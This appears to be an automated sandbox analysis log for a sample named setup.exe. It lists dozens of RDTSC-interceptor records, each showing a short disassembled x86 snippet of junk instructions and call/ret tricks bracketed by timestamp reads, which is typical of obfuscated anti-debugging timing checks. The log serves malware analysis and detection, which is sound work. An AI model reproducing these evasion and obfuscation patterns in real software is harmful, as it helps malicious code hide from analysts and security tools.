Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC98 second address: E2BCA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF90 second address: E2BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF94 second address: E2BFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7205h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F0 second address: E2C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F6 second address: E2C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBC9 second address: E2DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBCD second address: E2DBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FCh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF32CFB71FDh 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBF6 second address: E2DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC03 second address: E2DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC09 second address: E2DC0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC1 second address: E30CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC5 second address: E30CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F679 second address: E2F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F67E second address: E2F684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F684 second address: E2F688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E31055 second address: E3105B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E34166 second address: E3416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37A5B second address: E37A98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FF32CDD6566h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF32CDD6577h 0x00000014 jmp 00007FF32CDD656Fh 0x00000019 js 00007FF32CDD656Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DCD second address: E37DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DD1 second address: E37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE1 second address: E37DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE7 second address: E37DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E380C3 second address: E380C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3838D second address: E38391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E38391 second address: E3839F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C32 second address: E39C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C38 second address: E39C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C3C second address: E39C4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C4A second address: E39C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C698 second address: E3C69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C69E second address: E3C6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C6A2 second address: E3C6B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF32CDD6566h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E52B second address: E3E567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF32CFB71FEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF32CFB7202h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnp 00007FF32CFB7202h 0x0000001e ja 00007FF32CFB71FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E665 second address: E3E66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA3D second address: E3EA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA43 second address: E3EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0AE second address: E3F0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0B7 second address: E3F0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F182 second address: E3F186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F2EA second address: E3F2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D3 second address: E3F5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D7 second address: E3F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5DD second address: E3F626 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF32CFB71F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movsx esi, si 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FF32CFB7206h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E41D07 second address: E41D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42454 second address: E4245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4245A second address: E42460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42460 second address: E42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44280 second address: E44286 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44286 second address: E44290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44290 second address: E442F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FF32CDD656Bh 0x00000010 jmp 00007FF32CDD6572h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1246ED0Ch], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF32CDD6568h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1C24h], ebx 0x00000040 sub di, 5FBFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E442F6 second address: E442FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E46012 second address: E46016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E49048 second address: E49050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC52 second address: E4AC6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF32CDD656Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC6C second address: E4AD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7202h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF32CFB71F8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call 00007FF32CFB7206h 0x0000002c sbb bx, 52BFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460B16h], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FF32CFB71F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jng 00007FF32CFB71F8h 0x0000005c mov bl, 0Dh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FF32CFB71F8h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4DBB0 second address: E4DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CDFA second address: E4CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CF0B second address: E4CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCD6 second address: E4FCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCE0 second address: E4FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CDD6573h 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 520426D3h 0x00000015 call 00007FF32CDD6573h 0x0000001a mov dword ptr [ebp+12460B16h], edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124610CAh], edx 0x0000002a push 00000000h 0x0000002c jns 00007FF32CDD6566h 0x00000032 jnl 00007FF32CDD656Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FF32CDD6571h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE41 second address: E4FE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE47 second address: E4FE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51D05 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E67 second address: E52E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6574h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E82 second address: E52E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F2D second address: E53F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F32 second address: E53F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55005 second address: E55076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FF32CDD6566h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF32CDD6568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub ebx, dword ptr [ebp+122D26A2h] 0x00000034 mov bx, B540h 0x00000038 push 00000000h 0x0000003a mov di, 2F00h 0x0000003e xchg eax, esi 0x0000003f jbe 00007FF32CDD6574h 0x00000045 push eax 0x00000046 jg 00007FF32CDD6581h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CDD656Fh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55076 second address: E5507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51F22 second address: E51FD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD6570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 mov di, FC51h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, dword ptr [ebp+122D32D3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF32CDD6568h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 call 00007FF32CDD656Fh 0x0000004a mov ebx, dword ptr [ebp+122D30C0h] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0F39h] 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FF32CDD6568h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 mov bx, dx 0x00000074 push FFFFFFFFh 0x00000076 je 00007FF32CDD656Ch 0x0000007c sub ebx, dword ptr [ebp+122D2BBFh] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FF32CDD656Ch 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56033 second address: E56038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56038 second address: E56091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF32CDD6566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF32CDD6568h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a adc di, 19A0h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF32CDD6568h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5526D second address: E55271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E57011 second address: E57040 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FF32CDD6577h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FFE6 second address: E5FFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB87 second address: E5FB97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB97 second address: E5FB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB9D second address: E5FBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBA1 second address: E5FBB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF32CFB71FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBB5 second address: E5FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBC0 second address: E5FBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63110 second address: E63137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FF32CDD6568h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63137 second address: E6313D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6313D second address: E63165 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FF32CDD6576h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63165 second address: E6318B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FF32CFB7204h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63291 second address: E6329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF32CDD6566h 0x0000000a popad 0x0000000b rdtsc
